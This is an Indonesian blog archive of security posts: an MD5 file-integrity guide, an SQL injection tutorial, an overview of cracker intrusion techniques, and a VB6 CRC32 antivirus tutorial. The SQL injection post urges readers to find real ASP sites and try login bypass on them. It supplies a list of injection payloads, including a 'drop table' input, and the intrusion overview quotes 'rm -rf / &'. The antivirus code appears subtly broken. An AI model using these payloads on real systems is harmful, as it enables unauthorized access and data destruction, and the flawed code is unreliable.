Showing posts with label Security. Show all posts
Showing posts with label Security. Show all posts

Pengecekan keaslian Data

Pengecekan terhadap keaslian suatu dokumen untuk menghindari kejahatan komputer (judul Asli)


Jumlah kejahatan di bidang komputer (computer crime) akhir-akhir ini semakin marak terjadi. Hal tersebut sering terjadi karena pada saat ini banyak sekali aplikasi-aplikasi bisnis yang menggunakan komputer atau teknologi informasi (internet) sebagai media untuk saling bertukar data maupun program (software). Kejahatan di bidang komputer juga didukung lagi dengan semakin meningkatnya kemampuan para pemakai komputer yang pada awalnya hanya sebagai seorang user biasa, namun saat ini sudah banyak yang mulai melakukan percobaan atau bermain-main dengan atau bahkan membongkar sistem yang digunakannya untuk lebih memahami secara detail tentang sistem tersebut. Hal ini juga diperburuk lagi dengan banyak beredarnya peralatan (tools) yang berupa software mulai dari yang gratis alias free sampai dengan yang harus mengeluarkan sedikit uang untuk memperolehnya dari internet yang dapat dipergunakan untuk melakukan kejahatan di dalam dunia maya (cyber).

Ada beberapa cara yang banyak dilakukan oleh orang-orang yang tidak bertanggung jawab untuk melakukan kejahatan komputer yang berkaitan dengan penggunaan media pertukaran data secara eletronik dalam bentuk file, antara lain :

1.Mengirimkan file yang di-bundeling menjadi satu dengan file yang mengandung program virus, trojan, spyware dan sejenisnya (file-file executable dalam format *.EXE & *.COM) yang apabila dieksesusi oleh seseorang yang maka program-program tersebut akan ter-install dikomputer pengguna. Dampaknya yang lebih buruk lagi adalah apabila pengiriman file tersebut di dalamnya dipasangkan suatu program sejenis keyloger, maka apapun yang diketikan oleh user melalui keyboard komputernya maka akan dikirimkan secara periodik ke e-mail pemasang program (hacker) tersebut melalui internet / intranet.

2.Mengirimkan pesan rahasia yang dikirimkan bersama-sama dengan file yang dikirimkan ke orang lain. Misalnya saja seorang mengirimkan suatu dokumen kepada orang lain, tetapi pengirim dokumen tersebut menyisipkan sutu file rahasia yang dibuat dengan sengaja untuk menghindari sensor terhadap data-data yang telah dikirimkan. Hal ini juga sangat dimungkinkan dilakukan oleh para teroris yang akan memanfaatkan pengiriman pesan rahasia melalui media elektronik dalam bentuk file. Hal ini dilakukan dengan memanfaatkan slack space yang ada pada hardisk dengan menggunakan metode ADS “NTFS” Streaming. Jadi file yang dibuat tidak akan terlihat karena letaknya yang tersembunyi di dalam slack space pada hardisk meskipun dicari dengan perintah internal command di DOS atau Microsoft Windows seperti DIR atau menggunakan Windows Explorer.

Dari ketiga contoh yang penulis jelaskan tadi, sebenarnya contoh-contoh tersebut merupakan salah satu cara melindungi informasi dengan teknik stenografi. Dimana dengan suatu teknik tertentu informasi dikirimkan dan dibuat seolah-oleh pesan rahasia yang dikirimkan tidak ada atau tidak nampak, padahal pesan tersebut ada dan hanya saja kita tidak sadar bahwa sebenarnya pesan tersebut ada. Penggunaan teknik stenografi untuk mengirimkan data (dokumen) untuk tujuan yang baik sangat disarankan, apalagi apabila kita menginginkan informasi yang akan dikirimkan tersebut tidak ingin bocor ditengah jalan dan rahasia yang akan dikrimkan akan diterima oleh orang-orang yang tidak bertanggung jawab.

Untuk menghindari dari penyalahgunaan tadi, sebaiknya anda melakukan pengecekan terhadap file-file yang dibuat maupun yang anda terima, baik berupa file dokumen maupun file-file berupa program (software). Pengecekan dilakukan dengan menggunakan mengecek hash dari suatu file dengan menggunakan suatu Algoritma Hash Function tertentu. Beberapa algoritma Hash Function yang populer antara lain adalah : MD2/4/5, SHA1/2/256/512, RMD, Tiger, Panama, Adler, CRC32 dan Edonkey.

Software populer yang dapat dipergunakan untuk melakukan checksum, antara lain :
  1. Fsum
  2. MD5 Checker
  3. Advanced CheckSum Verifier
Penulis akan mencoba untuk menjelaskan pengecekan data-data penulis yang terdapat pada folder C:\Data, yang di dalamnya terdapat 8 (delapan) file, yaitu : Basic Networking.doc, Complete Console Windows.doc, Conlose WindowsXP.doc, GPRS.xls, Hacking BIOS Password.txt, Internet via CDMA.doc, Linux.ppt dan Wireless Networking.doc. Pada contoh ini penulis menggunakan software Advanced CheckSum Verifier untuk melakukan checksum dari file-file tersebut menggunakan Algoritma MD5 yang sangat populer.

Bukalah program Advanced CheckSum Verifier, kemudian masukan folder yang anda inginkan untuk melakukan pengecekan terhadap file yang ada di dalamnya. Setelah itu silahkan tentukan file hasil pengecekan. Dalam contoh ini penulis meyimpannya ke dalam folder C:\Data\md5sum-1.lst. Hasil pengecekan tersebut disimpan ke dalam file dengan format clear text yang dapat dibuka menggunakan editor seperti Notepad.

Pada setiap file asli milik penulis tersebut terlihat kode-kode bilangan heksa desimal yang panjangnya adalah 32 bit. Hasil checksum dari file tersebut tidak akan pernah sama antara satu file dengan file lainnya. Hal yang harus diperhatikan adalah, bahwa setiap perubahan yang terjadi pada suatu file, sekecil apapun perubahannya maka kode-kode tersebut akan berubah.

Perubahan terhadap file tersebut bisa saja dilakukan langsung oleh pemilik dokumen secara sah, tetapi juga dapat dilakukan oleh pihak lain yang bertanggung jawab. Misalnya dengan memodifikasi file tersebut dan ditambahkan ke dalamnya sejenis virus, trojan, backdoor, spyware ataupun keygen seperti di jelaskan sebelumnya.

Beberapa hal yang harus dilakukan dalam menerima atau mengirimkan data atau men-transfer (software / program) bahkan men-download file dari internet baik secara free, freeware maupun harus membayar (membeli) adalah:

  1. Lakukan pengecekan md5chechksum sebelum mengirimkan file agar anda mengetahui kealian dari file asli anda.
  2. .Lakukan pengecekan terhadap file yang diterima dari seseorang dengan cara meminta hasil md5checksum dari pengirim, kemudian lakukanlah cross check dengan hasil checksum yang anda lakukan sendiri terhadap file yang anda diterima.
  3. Untuk file-file yang diterima dengan cara men-download dari internet, pastikanlah anda men-download-nya dari situs atau website resmi dari pembuat software tersebut atau penjual resminya. Secara umum biasanya pembuat software atau penjual resmi akan menampilkan md5checksum dari file yang dibuat atau dijualnya, yaitu dengan menampilkan 32 bit kode dalam bilangan heksa decimal hasil cheksum.



SQL Injection


Sebelum membahas tentang sql injection pertama-tama saya akan menerangkan apa itu sql injection dan
kenapa bisa terjadi.
Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.
Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,
disini gw cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan
beberapa sql injection pada url.
Biasa Sql Injection dilakukan pada login page pada asp seperti di :
admin\login.asp
login.asp
Jadi yang akan menjadi target itu page tersebut ,
sekarang kita mulai aja dengan dasar-dasar sql injection :d.
Biasanya di sql statment
select id, user_name, password from user
maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :
select id, user_name,password from user where name = 'echo' and password='password'
Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language"
seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote 'breaks out'
dari delimiter nya SQL Jadi kalau misal ada inputan
User: echo';drop table user--
dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya :D
oh iya '--' merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.
Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti
input login + password. Nama field nya 'login' dan 'pass'. dan
SQL nya di asp: var sql = select * from users where username='"+login+"' and password='"+pass"'";
coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative)

pasti ke drop tuh table users
Aduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas :P kita langsung praktek aja>
Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau
admin\login.asp.
Kalau udah dapet masukin nich variable sql nya

user:admin
pass:' or 1=1--

Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d
atau :
user:' or 1=1--
admin:' or 1=1--

Mas , ga bisa nich gimana ya ?
Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa
buat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter
pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :
Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :
http://vivtim/index.asp?id=10
Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahan
pada addressnya seperti memasukan : test'1=1--
menjadi http://victim/index.asp?id=test'1=1--
Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target
lalu kita tamhankan hidden field pada source tersebut sebagai contoh :




Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username.
ingat script ini ditamhakna pd script yg sudah kalian download dr target .

Variable ' or 1=1--
Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting.Lihat contoh
pada sebuah web tertulis http://victim/index.asp?category=laptop
Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .
Kalau ditulis dalam script ASP maka akan menjadi :
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi
SELECT * FROM product WHERE PCategory='laptop'
lalu apa hub dengan 'or 1=1---
coba kalau kita ganti http://victim/index.asp?category=laptop menjadi
http://victim/index.asp?category=laptop'or 1=1--
Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya menjadi
SELECT * FROM product WHERE PCategory='laptop' or 1=1--'
artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkan
Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan
kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda -- merupakan
mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page
Kita bisa masuk kedalam login page tanpa password dan user name :d.
Kemungkinan-kemungkinan variable lainya :
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Selain masuk kedalam page tersebut kita juga bisa memanfaatkannya untuk remote execution dengan sql Injection
dan untuk artikel akan dimasukan dalam ezine 3 echo.or.id .Semoga artikel ini berguna .

-----------------------------------------------------------------------------------------------------------------------
Sumber Bacca : http://securityfocus.com/articles/SQLinjectionBasicTutorial.php
http://www.securiteam.com/securityreviews


Berbagai teknik keamanan jaringan Internet

Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com,
http://www.linuxfirewall.org/, http://www.linuxdoc.org,
http://www.cerias.purdue.edu/coast/firewalls/,
http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa bukubuku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cumacuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.vone. com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastillelinux. sourceforge.net/,
http://www.redhat.com/support/docs/tips/firewall/firewallservice.html. Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di downloadsecara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/,
http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini - tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linuxadmin@ linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id. Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di
http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan
dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailingist di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e. Dijelaskan oleh Front-line Information Security Team, "Techniques Adopted By
'System Crackers' When Attempting To Break Into Corporate or Sensitive Private
Networks," fist@ns2.co.uk http://www.ns2.co.uk. Seorang Cracker umumnya pria
usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka
sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada
usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu
baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil
menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 - karena tumpuan hari
depan bangsa Indonesia berada di tangan anak-anak muda kita ini.
Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan
kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri.
Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan
mejalankan program scanner. Setelah memperoleh akses root, cracker akan
menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang
ada.
Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan
Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3)
memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan
Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software
Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem
umumnya dapat di tembus misalnya dengan menembus mailserver external / luar
yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain
itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP
community string dapat mengubah sebuah router menjadi bridge (jembatan) yang
kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan
internal perusahaan (IntraNet).
Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking
(penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah
di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara
yang menggunakan Windows serangan dapat dilakukan dengan melompat dari
program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy
yang konfigurasinya kurang baik.
Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan
probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini
dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk
menjalankan perintah 'ls ' , (2) melihat file HTML di webserver
anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP
server, (4) menghubungkan diri ke mail server dan menggunakan perintah 'expn
', dan (5) mem-finger user di mesin-mesin eksternal lainnya.
Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang
dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin
administrator dan server yang biasanya di anggap paling aman di jaringan. Start
dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin,
/etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface
(CGI), dengan akses ke file /etc/hosts.allow.
Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa
di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan,
nmap dan banyak scanner kecil lainnya. Program seperti 'ps' & 'netstat' di buat
trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk
menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat
mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.
Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di
taklukan, maka cracker akan menjalan program untuk menaklukan program daemon
yang lemah di server. Program daemon adalah program di server yang biasanya
berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan
program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses
sebagai 'root' (administrator tertinggi di server).
Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi
pembersihan 'clean-up' operation dengan cara membersihkan berbagai log file. Dan
menambahkan program untuk masuk dari pintu belakang 'backdooring'. Mengganti
file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui
rsh & csh.
Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan
untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang
seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin
yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik /
komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara
menjalankan perintah 'rm -rf / &'. Yang terakhir akan sangat fatal akibatnya karena
sistem akan hancur sama sekali, terutama jika semua software di letakan di
harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika
hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.
Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu
di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi
penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya
terselamatkan dari ulah cracker yang men-disable sistem dengan 'rm -rf / &'.
Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat
menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hackerlah
Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki
untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki
karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb.
secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan
secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai &
budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang
biasanya terkesan futuristik dan jauh dari rasa sosial.
Pengembangan para hobbiest hacker ini menjadi penting sekali untuk
keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah
satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April
2001 akan di adakan hacking competition di Internet untuk membobol sebuah server
yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh
anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang
digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto
(hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti
umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak - bantuan &
sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda
ini.
Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya
pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang.
Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, "To boldly go
where no one has gone before


Penerapan MD5

Main#
Sekarang kehadiran para virus maker (–selanjutnya disingkat jadi VM saja) lokal telah
membuat gerah para user komputer tanah air. Bisa dibayangkan bila dari sekian banyak virus
lokal tidak satu-dua yang menghancurkan data (terutama bagi file office; word, excel,
dll…). Bagi para vendor Anti Virus (–selanjutnya disingkat menjadi AV saja) fenomena ini
adalah lahan bisnis untuk produk mereka. Sebut saja NORMAN, yang kini men-support
perusahaan konsultan virus lokal (–VAKSIN.COM) , Symantec, McAffe, NOD32, dan sebagainya.
Dengan menawarkan update definisi software AV tercepat, engine scanner paling sensitif, dan
lain-lain merupakan kiat untuk memancing para korban virus membeli dan menggunakan software
AV mereka. Bagi penulis sendiri hal ini memang agak memberatkan mengingat update file
definisi atau engine AV tsb haruslah melalui koneksi internet. Lalu bagaimana yang tidak
mempunyai akses sama sekali? Konsekuensinya iyalah tertinggal dalam hal pengenalan varian
virus baru yang pada ujung-ujungnya membuat AV yang sudah terinstall bagai ‘Macan Ompong'.
Kalau kita membuat AV sendiri bagaimana? dengan database definisi yang bisa diupdate oleh
kita bahkan dapat saling tukar dengan teman? Bisa saja, dengan syarat mau mempelajari
sedikit teknik pemograman. Pertama kita harus mengerti bagaimana cara kerja sebuah AV
sederhana, pada dasarnya sebuah software AV mempunyai komponen-komponen :

1. Engine scanner, ini merupakan komponen utama AV dalam mengenali sebuah pattern virus.
Engine ini dapat dikelompokkan menjadi statis dan dinamis. Statis dalam hal ini dapat
disebut menjadi spesifik terhadap pattern tertentu dari sebuah file virus. Checksum
merupakan salah satu contoh dari engine statis ini. Dinamis dalam artian dia mengenali
perilaku ‘umum' sebuah virus. Heuristic menjadi salah satu contohnya.
2. Database definition, menjadi sebuah referensi dari sebuah pattern file virus. Engine
statis sangat bergantung kepada komponen ini.
3. Decompress atau unpacking engine, khusus untuk pengecekan file-file yang terkompresi
(*.rar, *.zip, dll) atau kompresi atau packing untuk file PE seperti UPX, MeW , dll.

Tidak jarang hasil dari pengecekan terhadap file suspect virus menghasilkan false-positive
bahkan false-negative (– false-positive berarti file yang bersih dianggap thread oleh AV,
dan false-negative berarti file yang 100% thread akan dianggap bersih). Semua itu dapat
diakibatkan oleh ketidak-sempurnaan dari engine scanner itu sendiri. Misal
pada contoh kasus Engine String scanner (–Engine scanner yang menyeleksi string-string dari
file text-based), bila diterapkan rule 3 out of 5 (– bila AV menemukan 3 dari daftar 5
string kategori malicious) maka AV akan memberikan bahwa file terindikasi sebuah thread
yang positif. Padahal file tsb nyatanya tidak menimbulkan efek berbahaya bila dijalankan
atau dieksekusi. Kesalahan scanning macam ini lazim ditemukan untuk file-file *.VBS, *.HTML,
dll. Untuk penggunaan engine checksum sangat banyak ditemui di beberapa software AV lokal.
Checksum yang lazim digunakan diantaranya CRC16, CRC32, MD5, dll. Dikarenakan mudah untuk
diimplementasikan. Engine ini sendiri bukannya tanpa cacat, Checksum bekerja dengan
memproses byte demi byte dari sebuah file dengan sebuah algoritma tertenu (– tergantung dari
jenis checksum yang digunakan) sehingga menghasilkan sebuah format tertentu dari file tsb.
Contoh checksum menggunakan CRC32 dan MD5 :

* calCrc = CRC32(file_name_and_path)
* calMD5 = MD5(file_name_and_path)

Maka isi dari string calCrc adalah 7AF9E376, sedangkan untuk MD5nya adalah
529CA8050A00180790CF88B63468826A. Perlu diketahui bila virus menerapkan rutin yang mengubah
byte tertentu dari badan virus tsb setiap kali maka penggunaan engine checksum ini akan kurang
optimal karena bila 1 byte berubah dari file maka checksum juga akan berubah.

Mari kita belajar membuat sebuah AV sederhana, yang diperlukan :

1. Software Visual Basic 6.0
2. Sedikit pemahaman akan pemograman Visual Basic 6.0
3. Sampel file bersih atau virus (– opsional)

First#
Sekarang kita akan belajar membuat sebuah rutin sederhana untuk :
- Memilih file yang akan dicek
- Membuka file tersebut dalam mode binary
- Memproses byte demi byte untuk menghasilkan Checksum

Buka MS-Visual Basic 6.0 anda, lalu buatlah sebuah class module dan Form dengan menambahkan sebuah
objek Textbox, CommonDialog dan Command Button. (Objek CommonDialog dapat ditambahkan dengan
memilih Project -> COmponent atau Ctrl-T dan memilih Microsoft Common Dialog Control 6.0) Ketikkan
kode berikut pada class module (kita beri nama class module tsb clsCrc) :

================= START HERE ====================

Private crcTable(0 To 255) As Long ‘crc32

Public Function CRC32(ByRef bArrayIn() As Byte, ByVal lLen As Long, Optional ByVal lcrc As
Long = 0) As Long

‘bArrayIn adalah array byte dari file yang dibaca, lLen adalah ukuran atau size file

Dim lCurPos As Long ‘Current position untuk iterasi proses array bArrayIn
Dim lTemp As Long ‘variabel temp hasil perhitungan

If lLen = 0 Then Exit Function ‘keluar fungsi apabila ukuran file = 0
lTemp = lcrc Xor &HFFFFFFFF

For lCurPos = 0 To lLen
lTemp = (((lTemp And &HFFFFFF00) &H100) And &HFFFFFF) Xor (crcTable((lTemp And 255) Xor
bArrayIn(lCurPos)))
Next lCurPos

CRC32 = lTemp Xor &HFFFFFFFF

End Function

Private Function BuildTable() As Boolean
Dim i As Long, x As Long, crc As Long
Const Limit = &HEDB88320

For i = 0 To 255
crc = i
For x = 0 To 7
If crc And 1 Then
crc = (((crc And &HFFFFFFFE) 2) And &H7FFFFFFF) Xor Limit
Else
crc = ((crc And &HFFFFFFFE) 2) And &H7FFFFFFF
End If
Next x
crcTable(i) = crc
Next i
End Function

Private Sub Class_Initialize()
BuildTable
End Sub

================= END HERE ====================

Lalu ketikkan kode berikut dalam event Command1_Click :

================= START HERE ====================

Dim namaFileBuka As String, HasilCrc As String
Dim CCrc As New clsCrc ‘bikin objek baru dari class ClsCrc
Dim calCrc As Long
Dim tmp() As Byte ‘array buat file yang dibaca

Private Sub Command1_Click()
CommonDialog1.CancelError = True ‘error bila user mengklik cancel pada CommonDialog
CommonDialog1.DialogTitle = “Baca File” ‘Caption commondialog

On Error GoTo erorhandle ‘label error handle

CommonDialog1.ShowOpen
namafilbuka = CommonDialog1.FileName
Open namafilbuka For Binary Access Read As #1 ‘buka file yang dipilih dengan akses baca
pada mode binary
ReDim tmp(LOF(1) - 1) As Byte ‘deklarasi ulang untuk array, # Bugs Fixed #
Get #1, , tmp()
Close #1

calCrc = UBound(tmp) ‘mengambil ukuran file dari array
calCrc = CCrc.CRC32(tmp, calCrc) ‘hitung CRC

HasilCrc = Hex(calCrc) ‘diubah ke format hexadesimal, karena hasil perhitungan dari class
CRC masih berupa numeric
Text1.Text = HasilCrc ‘tampilkan hasilnya
Exit Sub

erorhandle:
If Err.Number <> 32755 Then MsgBox Err.Description ‘error number 32755 dalah bila user mengklik
tombol cancel pada saat memilih file

================= END HERE ====================

COba anda jalankan program diatas dengan memencet tombol F5, lalu klik Command1 untuk memilih
dan membuka file. Maka program akan menampilkan CRC32nya.

Second#
Kode diatas dapat kita buat menjadi sebuah rutin pengecekan file suspect virus dengan antara
membandingkan hasil CRC32nya dan database CRC kita sendiri. Algoritmanya adalah :
- Memilih file yang akan dicek
- Membuka file tersebut dalam mode binary
- Memproses byte demi byte untuk menghasilkan Checksum
- Buka file database
- Ambil isi file baris demi baris
- Samakan Checksum hasil perhitungan dengan checksum dari file

Format file database dapat kita tentukan sendiri, misal :
- FluBurung.A=ABCDEFGH
- Diary.A=12345678
Dimana FluBurung.A adalah nama virus dan ABCDEFGH dalah Crc32nya. Jika kita mempunyai format
file seperti diatas, maka kita perlu membaca file secara sekuensial per baris serta memisahkan
antara nama virus dan Crc32nya. Dalam hal ini yang menjadi pemisah adalah karakter ‘='.
Buat 1 module baru (– diberi nama module1) lalu isi dengan kode :

================= START HERE ====================

Public namaVirus As String, CrcVirus As String ‘deklarasi variabel global untuk nama dan CRC
virus Public pathExe as String ‘deklarasi variabel penyimpan lokasi file EXE AV kita

Public Function cariDatabase(Crc As String, namaFileDB As String) As Boolean
Dim lineStr As String, tmp() As String ‘variabel penampung untuk isi file
Open namaFileDB For Input As #1 ‘buka file dengan mode input
Do
Line Input #1, lineStr
tmp = Split(lineStr, “=”) ‘pisahkan isi file bedasarkan pemisah karakter ‘='
namaVirus = tmp(0) ‘masukkan namavirus ke variabel dari array
CrcVirus = tmp(1) ‘masukkan Crcvirus ke variabel dari array
If CrcVirus = Crc Then ‘bila CRC perhitungan cocok/match dengan database
cariDatabase = True ‘kembalikan nilai TRUE
Exit Do ‘keluar dari perulangan
End If
Loop Until EOF(1)
Close #1
End Function

================= END HERE ====================

Lalu tambahkan 1 objek baru kedalam Form, yaitu Command button2. lalu ketikkan listing kode
berikut kedalam event Command2_Click :

================= START HERE ====================
If Len(App.Path) <= 3 Then ‘bila direktori kita adalah root direktori pathEXE = App.Path Else pathEXE = App.Path & “” End If CommonDialog1.CancelError = True ‘error bila user mengklik cancel pada CommonDialog CommonDialog1.DialogTitle = “Baca File” ‘Caption commondialog On Error GoTo erorhandle ‘label error handle CommonDialog1.ShowOpen namafilbuka = CommonDialog1.FileName Open namafilbuka For Binary Access Read As #1 ‘buka file yang dipilih dengan akses baca pada mode binary ReDim tmp(LOF(1) - 1) As Byte ‘deklarasi ulang untuk array # Bugs Fixed # Get #1, , tmp() Close #1 calCrc = UBound(tmp) ‘mengambil ukuran file dari array calCrc = CCrc.CRC32(tmp, calCrc) ‘hitung CRC HasilCrc = Hex(calCrc) ‘diubah ke format hexadesimal, karena hasil perhitungan dari class CRC masih berupa numeric If cariDatabase(HasilCrc, pathEXE & “DB.txt”) Then ‘bila fungsi bernilai TRUE MsgBox “Virus ditemukan : ” & namaVirus ‘tampilkan message Box End If Exit Sub erorhandle: If Err.Number <> 32755 Then MsgBox Err.Description ‘error number 32755 dalah bila user mengklik
tombol cancel pada saat memilih file

================= END HERE ====================

Fitur AV sederhana ini dapat ditambahkan dengan fitur process scanner, akses registry, real-time
protection (RTP) dan lain lain. Untuk process scanner pada dasarnya adalah teknik enumerasi
seluruh proses yang sedang berjalan pada Sistem Operasi, lalu mencari letak atau lokasi file dan
melakukan proses scanning. Fitur akses registry memungkinkan kita untuk mengedit secara langsung
registry windows apabila akses terhadap registry (–Regedit) diblok oleh virus. Sedangkan fitur
RTP memungkinkan AV kita berjalan secara simultan dengan windows explorer untuk mengscan
direktori atau file yang sedang kita browse atau lihat. Untuk ketiga fitur lanjutan ini akan
dibahas pada artikel selanjutnya.

Kesimpulan#
Tidak harus membeli software AV yang mahal untuk menjaga komputer kita dari ancaman virus, kita
